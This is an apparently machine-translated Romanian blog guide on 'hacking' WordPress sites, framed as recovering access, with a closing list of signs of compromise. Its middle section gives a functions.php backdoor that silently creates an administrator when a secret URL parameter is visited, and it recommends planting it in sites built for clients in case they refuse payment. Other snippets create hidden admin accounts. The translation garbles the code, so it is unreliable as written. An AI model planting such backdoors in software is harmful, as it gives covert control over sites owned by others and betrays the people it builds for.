Cum să jucați pe un site WordPress WordPress, Ghidul complet

Cum să piratezi un site WordPress, ghidul complet


Nu protejăm, nu aprobăm și nu încurajăm nici un comportament ilegal sau rău intenționat! Scopul acestui articol este să explice cum să hack sau recuperezi accesul la un site WordPress care îți aparține sau că ai drepturi de editare, admin și acces. Orice ai face, îl faci singur. Nu suntem responsabili pentru acțiunile dvs. Acest ghid servește doar în scopuri educaționale.

Metodele descrise vă vor ajuta să recâștigați accesul la site, chiar dacă nu mai aveți un cont, dar vor necesita câteva informații despre site și nu vă vor ajuta să hack în nicio instalare aleatorie WordPress.

În acest ghid, suntem pe cale să vă arătăm:

  • Cum să piratezi un site web WordPress
  • Cum să creezi un backdoor în WordPress
  • Cum se creează un cont de utilizator nou prin FTP
  • 10 semne că site-ul dvs. WordPress este hacked

Cum să piratezi un site WordPress, ghidul complet

Situații în care te poți ajuta

Dacă vă aflați într-una dintre următoarele situații, metodele noastre vă vor ajuta să redobândiți accesul:

  • ai uitat numele de utilizator sau adresa de e-mail
  • opțiunea de resetare a parolei nu funcționează pe serverul de găzduire
  • resetarea e-mailurilor cu parolă nu apar
  • nu mai aveți acces la adresa de e-mail a contului
  • știți numele de utilizator și parola, dar combinația nu funcționează pur și simplu

Pentru a utiliza metodele descrise mai jos, va trebui numai una dintre următoarele:

  • Acces FTP la server sau
  • cPanel acces la server sau
  • acces la baza de date MySQL și posibilitatea de conectare la ea de la distanță

Metoda # 1 – modul MySQL

Utilizați această metodă pentru a schimba parola (sau numele de utilizator dacă este nevoie) a unui utilizator existent sau pentru a crea un cont nou. Veți avea nevoie de acces cPanel sau de acces direct MySQL la baza de date a site-ului. Să începem schimbând parola unui utilizator existent.

Dacă utilizați cPanel, conectați-vă (cPanel poate fi accesat întotdeauna prin intermediul https://yoursite.com:2083 link), localizați și deschideți phpMyAdmin. Lista bazelor de date și a tabelelor este în stânga. Căutați tabelul care se termină _users. Probabil va fi wp_users, dar dacă aveți mai multe site-uri WordPress instalate pe server, trebuie să îl găsiți pe cel potrivit.

Tabelul din dreapta va avea utilizatorul pe care doriți să îl editați. Urmați aceeași procedură dacă vă conectați la MySQL prin intermediul unui client extern, cum ar fi SQLyog. După ce localizați tabelul și înregistrarea reală a utilizatorului, este timpul să schimbați parola.

După cum probabil v-ați dat seama până acum, parola este salvată în user_pass câmp, hashed folosind algoritmul MD5. Deschide generator online MD5 introduceți parola pe care doriți să o utilizați și faceți clic pe „Hash”. Copiați șirul generat și înlocuiți parola originală Cu acesta. În phpMyAdmin, puteți edita câmpul făcând dublu clic pe el. Procedura este similară la alți clienți MySQL. Salvați modificările și conectați-vă la WordPress cu noua parolă.

Tabelul utilizatorilor WP

Numele de utilizator, parolele șterse și e-mailurile sunt stocate în wp_users tabelul bazei de date

Încă pe metoda # 1 – crearea unui utilizator nou

Crearea unui nou utilizator este ceva mai complicat, dar totuși gestionabil în mai puțin de un minut. Creați o înregistrare nouă în tabel de utilizatori și populează: user_login, user_pass (hashed, folosind funcția MD5 descrisă mai sus) și user_email. Toate celelalte câmpuri pot rămâne goale; nu contează. Salvați noua înregistrare. Odată salvat, MySQL îi va oferi un ID unic. Este numărul din câmpul de identificare. Ține minte asta.

Acum du-te la _usermeta masa. Tine minte, prefixul tabelului trebuie să fie același cu cel al utilizatorilor. De exemplu wp_users și wp_usersmeta. Dacă prefixul nu este același, veți edita tabelul greșit (al unei alte instalări WP) și noul cont nu va funcționa. Vom crea două înregistrări noi. Ignorați umeta_id câmp pentru amândoi. A stabilit numele de utilizator câmp la valoarea pe care tocmai ți-ai amintit-o (noua valoare de identificare din tabelul utilizatorilor). Pentru primul set de înregistrări meta_key la wpct_user_level și meta_value la 10. Pentru cel de-al doilea meta_key la wpct_capabilities și meta_value la a: 1: {s: 13: "administrator"; b: 1;}. Salvați ambele. Ați terminat – conectați-vă!

Metoda # 2 – modul funcții.php

Această abordare poate fi utilizată fie prin editarea funcțiilor.php prin cPanel, fie prin utilizarea unui client FTP pentru a face acest lucru. Dacă utilizați cPanel găsiți File Manager și deschideți-l. În primul rând, trebuie să găsim folderul temei active.

Mergi la public_html / wp_content / teme pliant. Dacă îți vezi imediat tema și știi care este – grozav. Deschideți folderul său și începeți editarea functions.php. Dacă nu, deschideți site-ul, faceți clic dreapta oriunde, selectați „View source”. Apoi apăsați Ctrl + F și începeți să tastați / Teme / în curând veți avea o mulțime de adrese URL evidențiate și veți recunoaște numele folderului pentru tema activă.

Găsiți-l în structura fișierului, deschideți și începeți editarea functions.php. Copiați / inserați următorul cod la sfârșitul fișierului. Gândiți-vă la închidere ?> Etichete PHP dacă le aveți. Trebuie să fie pe ultima linie. Așa că introduceți codul înaintea lor.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (tablou ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = WP_User nou ($ user_id);
$ User-> set_role ( 'administrator');
}

Editați doar primele două rânduri ale codului pentru a reflecta noul dvs. cont. Dacă există deja un utilizator în WP cu acel e-mail, nu se va crea un cont nou, atunci asigurați-vă că este nou. Schimbați și parola – nu vă lăsați păcălit de ghicitori. După ce salvați fișierul, deschideți pur și simplu site-ul dvs., codul va fi rulat, un nou cont cu privilegii de administrator creat și veți putea să vă autentificați cu acesta.

După ce faceți acest lucru, nu uitați să ștergeți codul functions.php.

Alte metode de hacking

Cunoscând parola FTP, cPanel sau MySQL, dovediți că aveți dreptul de acces legitim la server și, prin urmare, ar trebui să aveți acces și la instalarea (instalațiile) WordPress. Dacă nu aveți niciunul dintre aceste conturi, nu sunteți deloc bine (hacking pe site-urile altor persoane) și nu este plăcut!

Vă rugăm să rețineți că obținerea accesului neautorizat la orice computere, site-uri sau servere este o infracțiune gravă și este tratată prompt în majoritatea țărilor.

Dacă vă este teamă că site-ul dvs. WordPress poate fi hackat, verificați această pagină cu un scaner gratuit de securitate WordPress. Dacă nu aveți timp să vă configurați blogul, lăsați-l să facem pentru dvs..

Cum să creezi un backdoor în WordPress

Când ușa din față este închisă, puteți încerca ușa din spate. Acest lucru poate părea un mod rău de a utiliza codul pentru a intra pe site fără a avea acces la acesta, dar există de fapt momente în care trebuie să controlați propriul site dacă cineva l-a furat.

Dacă creează site-uri web pentru alte persoane, faceți mai devreme sau mai târziu un client care va refuza să vă plătească pentru munca dvs. un client care vă va șterge informațiile de conectare și va prelua controlul asupra a tot ceea ce ați făcut. Uneori, va fi suficient pentru a crea un utilizator nou prin FTP sau pentru a reseta o parolă. Când nu este suficient, s-ar putea să doriți să vă retrageți sau să creați un acces în spate la paginile dvs. de admin.

Dar dacă ai decis să ascunzi o mică bucată de cod în mediul tău WordPress, s-ar putea să te salvezi oarecare demnitate și obține acces la site-ul WordPress cu privilegii de administrator. Și de aici încep jocurile.

Oricât de multe ori acest hoț șterge informațiile dvs. sau restabilește o copie de rezervă pe un server pe care probabil că îl deține, există șansa ca el să nu știe nimic despre intrările din spate. Dacă ar face acest lucru, probabil că n-ar avea nici măcar nevoie de ajutorul dvs. pentru a configura WordPress, nu?

Creați un backdoor:

OK, suficient cu discuția; Iată o bucată de cod pe care va trebui să o finalizați:

  1. Deschideți fișierul funcții.php
  2. Copiați / Lipiți următorul cod:
  3. add_action ('wp_head', 'wploop_backdoor');
    function wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    necesită ( 'wp-includes / registration.php');
    If (! Username_exists ('username')) {
    $ user_id = wp_create_user ('nume', 'trecere');
    $ user = WP_User nou ($ user_id);
    $ User-> set_role ( 'administrator');
    }
    }
    }
    ?>
  4. Salvează modificările

Dacă lăsați codul așa cum este, tot ce trebuie să faceți pentru a crea un nou administrator pe site este vizita http://www.yourdomain.com/?backdoor=knockknock

După încărcarea paginii, noul dvs. nume de utilizator este “Nume” si parola “trece”.

Desigur, puteți schimba asta în cod de mai sus, schimbând „nume” și „trece” la orice vrei. Puteți schimba, de asemenea, legătura către ușa din spate, schimbând „spate în spate” și / sau „knockknock” în orice lucru cu care vă prezentați.

Încercați funcția – nu numai că este distractiv, dar vă poate ajuta cu adevărat cândva în viitor, când sunteți pe punctul de a crea un site web pentru cineva în care nu puteți avea încredere completă. De asemenea, ar trebui să vă nivelificați abilitățile de WordPress și blogging.

Cum se creează un cont de utilizator nou prin FTP

Crearea de noi conturi de utilizator pe WordPress este foarte ușoară. Ca administrator, trebuie să navigați la pagina de administrator a utilizatorilor unde puteți crea un cont nou pentru orice rol de utilizator. Acest lucru se poate face în câteva secunde, iar un utilizator nou creat se poate autentifica imediat cu numele de utilizator și parola date.

Dar ce se întâmplă dacă pierdeți acces la administratorul dvs. WordPress? Lucrurile s-ar putea complica puțin, dar nu vă faceți griji – avem o funcție care vă poate salva viața de administrator.

Indiferent dacă un alt administrator ți-a șters contul, dacă ai șters toți utilizatorii din baza de date din greșeală, ai folosit un plugin care nu funcționează sau ai fost hackat, poți totuși să iei din nou controlul. Uneori este posibil să aveți acces doar la serverul dvs. FTP în timp ce unul HTTP va fi la îndemâna dvs. și va trebui să creați un nou administrator. În timp ce acesta poate fi un caz rar, următoarea funcție vă va salva.

Pentru a crea un cont nou în afara mediului de administrare WordPress, tot ce ai nevoie este un acces FTP pe site-ul tău. Ca administrator, ar trebui să aveți toate informațiile necesare pentru a vă conecta la serverul dvs. și puteți crea rapid un cont prin crearea unei noi funcții în tema dvs..

Creați un cont de utilizator nou prin FTP:

  1. Deschideți client FTP și conectați-vă la contul dvs.
  2. Navigați la conținut / teme wp
  3. Deschideți folderul temei pe care o utilizați
  4. Căutați fișierul funcții.php și editați-l
  5. Copiați și lipiți următoarea funcție:
  6. funcție admin_account () {
    $ user = 'Username';
    $ pass = 'Parolă';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ utilizator, $ pass, $ e-mail);
    $ user = WP_User nou ($ user_id);
    $ user-> set_role ('administrator');
    }}
    ADD_ACTION ( 'init', 'admin_account');
    
  7. Schimbați numele de utilizator, parola și e-mailul la ceva unic
  8. Salvează modificările

Asigurați-vă că numele de utilizator, parola și adresa de e-mail pe care ați setat-o ​​în funcție sunt unice sau altfel funcția nu va funcționa corect. După ce ați salvat modificările, ați terminat și puteți naviga la panoul de conectare WP. Utilizați informații noi pentru a vă autentifica și după ce ați verificat contul, puteți șterge funcția din fișierul funcții.php.

Funcția prezentată mai sus creează un cont de admin, dar îl puteți modifica cu ușurință pentru a crea un cont cu orice alt rol de utilizator. Pur şi simplu schimba rolul pe 8lea rând a codului către editor, autor, contribuabil, abonat sau orice alt rol de utilizator pe care l-ați creat.

Din păcate, dacă ți-ai pierdut contul de administrator, ai pierdut și toate mesajele scrise sub acest nume de utilizator. Acesta este motivul pentru care ar trebui să păstrați întotdeauna o copie de rezervă pe care să o puteți recupera cu ușurință. Dacă citiți acest lucru în timp ce aveți contul de admin, luați acest lucru ca un memento pentru a crea imediat o copie de rezervă și marcați acest articol doar în cazul în care va trebui să vă creați un cont în afara WordPress în viitor.

10 semne că site-ul dvs. WordPress este hacked

WordPress este o platformă imensă de blogging. Există milioane de utilizatori și se pare că numărul crește rapid în fiecare zi. Oamenii au chiar tendința de a transfera site-urile web create în alte sisteme de gestionare a conținutului în acest sistem open source mai des decât ar putea crede. Și, în timp ce acest lucru este bun, asta înseamnă că hackerii vor pune și WordPress într-un loc numărul unu atunci când încearcă să invadeze site-uri aleatorii.

De obicei, dacă sunteți hacked, veți ști despre asta instantaneu. Site-ul dvs. va deveni inaccesibil; nu veți putea să vă autentificați și, uneori, un hacker va lăsa chiar un mesaj pe prima pagină. Dar mai des decât nu, s-ar putea să nu observați că ceva s-a schimbat. În această parte a articolului, urmează să vă arătăm mai multe semne care v-ar putea arăta că site-ul dvs. WordPress a fost piratat și câteva soluții la problemă.

1. Conectare nereușită

Acest semn este destul de evident. Dacă ați folosit o combinație de nume de utilizator și parolă o perioadă fără să aveți probleme, puteți deveni suspect dacă dintr-o dată WordPress nu vă recunoaște contul. Dacă un hacker trebuie să se autentifice pe site-ul dvs., șansele sunt ca acesta să vă schimbe rapid privilegiile de administrator.

Poate că trebuie să-și schimbe parola sau să ți-a șters complet contul. Înainte de a începe să intrați în panică după prima dată când vă trimiteți mesaje WordPress despre numele de utilizator / parola incorecte, vă rugăm să luați în considerare faptul că este posibil să fi introdus o combinație greșită sau că este posibil să fi activat butonul de blocare a capacelor.

Soluţie: Încercați să recuperați parola prin e-mail sau folosiți un alt cont pentru a vă autentifica. Pentru a vă asigura că autentificarea rămâne în siguranță, vă recomandăm să instalați Autentificare Ninja plugin pentru WordPress.

2. Conținutul rău intenționat este adăugat pe site-ul dvs.

Site-ul conține un avertisment malware

Dacă începeți să observați conținut necunoscut pe site-ul dvs., puteți începe să vă faceți griji. Când au șansa de a accesa zona de administrare, hackerii vor putea să-ți schimbe nucleul și atât fișierele tale, cât și fișierele plugin. Asta înseamnă că ajung să schimbe orice își doresc.

În timp ce unii hackeri vor modifica drastic aspectul site-ului dvs. și poate chiar vor explica faptul că ați fost hacked, ceilalți vor fi mult mai subtili în acest sens..

Soluţie: Încercați să căutați conținut ascuns în codul site-ului web. S-ar putea să existe link-uri către hackeri de site-uri dăunătoare plantate în subsolul site-ului dvs. sau s-ar putea să aibă instalate ferestre care se vor deschide în mod regulat clienților dvs. Utilizați Security Ninja pentru a scana site-ul dvs. sau a monitoriza continuu site-ul pentru astfel de probleme.

3. Vizite suspecte

Dacă nu urmăriți site-ul dvs. web, ar trebui să începeți acest lucru imediat. O modalitate simplă de a face este utilizarea Google Analytics care, printre multe alte funcții, vă poate spune câte vizite obțineți și de unde vin acele vizite. După ceva timp, veți cunoaște site-ul dvs. web. Asta înseamnă că veți ști de unde vin vizitele, veți ști când lansați o nouă campanie și când există noi linkuri de promovare lansate în sălbăticie.

Dar dacă observi brusc că site-ul tău primește un număr imens de noi vizite din domeniul suspect, veți dori să investigați acest lucru în continuare, deoarece site-ul dvs. ar putea fi doar hacked. De obicei, acel tip de vizite va duce la o rată de respingere de 100%, ceea ce înseamnă că a fost accesată o singură pagină. Hackerii vor folosi frecvent sisteme automate care vor conduce alte site-uri proaste către dvs. Indiferent dacă este vorba despre codul rău care este executat pe site-ul dvs. sau dacă ați făcut parte dintr-o rețea de spaming, lucrurile pot deveni serioase și va trebui să verificați site-ul dvs. pentru a avea cod rău intenționat.

Soluţie: Utilizare Instrumente pentru webmasters Google pentru a găsi domenii suspecte

4. O scădere bruscă a traficului

Navigare sigură Starea site-ului

Spre deosebire de ultimul semn menționat de a fi hacked, acesta ar putea să vă avertizeze, deoarece există o scădere a numărului de vizite. În loc să vă trimit la noi vizite, un hacker ar putea trimite vizite departe de site-ul dvs.. Acest lucru s-ar putea întâmpla deoarece un hacker a redirecționat site-ul dvs. către altul. Celălalt motiv pentru a obține mai puțini vizitatori este faptul că Google a listat site-ul tău negru. Această acțiune ar arăta un mesaj fiecărui utilizator care poate alege să nu deschidă site-ul dvs. deoarece este infectat.

Soluţie: Folosiți Google Navigare sigură Starea site-ului pentru a verifica dacă site-ul dvs. este marcat ca nesigur și este în prezent periculos de vizitat.

5. Rezultatele motorului de căutare sunt ciudate

Dacă nu ați observat nicio modificare pe site-ul dvs., dar aflați că rezultatele căutării în Google și în alte motoare de căutare sunt ciudate (arată diferite titluri și alte meta-date), acesta ar putea fi un semn clar al unui site hacked. Este posibil ca un hacker să vă fi schimbat conținutul într-un mod care să fie vizibil doar pentru un expert. Cu toate acestea, modificarea ar fi vizibilă în rezultatele motorului de căutare.

Soluţie: Verificați-vă site-ul cu Instrumente pentru webmasters Google, și verificați dacă site-ul dvs. a fost hacked cu asta instrument gratuit online.

6. Nu puteți trimite / primi e-mailuri

Odată ce un hacker va avea acces la site-ul dvs., va dori probabil folosește-ți serverul pentru a face spam pentru toți ceilalți. Când aflați că nu puteți trimite sau primi e-mailuri noi de la WordPress, acesta poate fi un semn clar că ați fost hacked. Verificați din nou e-mailul, apoi verificați-l cu furnizorul pentru a vă asigura că nu există erori.

Soluţie: Testează-ți WordPress funcția de mail cu acest plugin gratuit.

7. Site-ul nu există

Serverul nu a fost gasit

Există momente în care hackerii nu vă vor accesa site-ul pentru a planta coduri rău intenționate, a redirecționa utilizatorii sau a utiliza e-mailul dvs. pentru spam. Uneori, tot ce vor dori să facă este să vă prăbușească site-ul. Rar, un hacker va șterge totul cu succes de pe întregul server. Acesta este motivul pentru care este important să vă găzduiți fișierele la o companie de găzduire de renume, care va asigura securitatea și va păstra, de asemenea, copii de zi cu zi sau cel puțin săptămânale ale site-ului dvs. Este o practică bună să îți faci și propriile backup-uri din când în când, astfel încât site-ul să poată fi restaurat rapid.

Soluţie: Instalați unul dintre cele mai bune pluginuri pentru gestionarea copiilor de rezervă în WordPress.

8. Fișiere suspecte

Similar cu conținutul rău intenționat care poate fi adăugat la fișierele existente, un hacker ar putea să planteze fișiere suplimentare oriunde în folderul root. Este un lucru bun să vă cunoașteți drumul prin WordPress, dar dacă nu aveți această experiență, ar trebui să aveți la dispoziție un instrument de securitate care vă poate verifica toate fișierele și activitățile. Recent, am revizuit Security Ninja, care este un instrument perfect pentru verificarea tuturor fișierelor dvs. WordPress.

Soluţie: Încercați să căutați fișiere care nu aparțin instalării dvs. WordPress. Utilizați Security Ninja pentru a scana site-ul dvs. în mod regulat și pentru a găsi automat aceste fișiere. Apoi ștergeți fișierele sau eliminați codul rău intenționat din fișierele infectate. Nu uitați de suplimentul Core Scanner pentru Security Ninja.

9. Membrii noi

În funcție de site-ul dvs., puteți fi singurul capabil să adăugați membri noi. În acest caz, un e-mail care vă spune despre utilizatorii nou înregistrați poate declanșa o alarmă. Dacă există și alte admin-uri care au capacitatea de a adăuga noi membri, consultați-le cu privire la activitatea suspectă.

Soluţie: Modificați adresa URL de conectare cu un plugin gratuit, limitați accesul la pagina dvs. de autentificare WordPress utilizând fișierul .htpasswd și folosiți Login Ninja pentru a vă proteja formularul de autentificare tot timpul.

10. Verificați evenimentele programate pe serverul dvs.

Uneori, un hacker nu va face nimic pentru site-ul dvs. web odată ce își va găsi locul, vor părăsi evenimentele programate care ar putea dăuna site-ului dvs. cândva în viitor. Această tehnică este periculoasă deoarece un hacker poate lăsa victima neexperimentată neîncăpătoare la început. Este posibil să fii infectat și să nu știi nimic despre asta.

Soluţie: Verificați lucrările CRON pe un server pe care îl utilizați și asigurați-vă că nu există sarcini programate suspecte.

Înveliți

Sperăm că acest articol vă va ajuta să gestionați chiar și un site WordPress mai sigur și că vă va ajuta să redobândiți accesul la acesta în situații proaste. Și chiar dacă site-ul dvs. este curat, vă rugăm să nu îl luați de la sine.
Asigurați-vă întotdeauna că blogul dvs. este cât se poate de sigur. Vă sugerăm pluginuri de securitate pentru WordPress care vă pot salva de cele mai multe ori. Totuși, nu fi cel care folosește o parolă nesigură și ai grijă când piratezi propriul site WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map